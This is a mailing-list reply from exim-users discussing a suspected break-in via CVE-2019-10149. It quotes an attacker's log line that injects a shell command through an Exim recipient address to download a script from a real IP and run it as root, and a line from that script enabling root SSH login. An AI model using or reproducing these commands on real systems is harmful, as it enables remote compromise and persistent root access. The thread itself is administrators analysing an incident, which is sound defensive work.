Re: [exim] just been hacked, could be CVE-2019-10149?

Inizio della pagina
Delete this message
Reply to this message
Autore: Klaus Ethgen
Data:  
To: exim-users
Oggetto: Re: [exim] just been hacked, could be CVE-2019-10149?
> > root+${run{/bin/bash -c "wget --no-check-certificate -T 36
> > https://185.162.235.211/ldm1ip -O /root/.fabyfmnp && sh /root/.fabyfmnp
> > -n" &}}@xxx: Too many "Received" headers - suspected mail loop
> >
> >
> Interesting script - targetting Linux systems using systemd.


Not only that, it is dilettantic...

"${sudo} echo PermitRootLogin yes >> /etc/ssh/sshd_config"

I can write the sudo bevore any command but it gives no more sense.

Regards
   Klaus
-- 
Klaus Ethgen                                       http://www.ethgen.ch/
pub  4096R/4E20AF1C 2011-05-16            Klaus Ethgen <Klaus@???>
Fingerprint: 85D4 CA42 952C 949B 1753  62B3 79D0 B06F 4E20 AF1C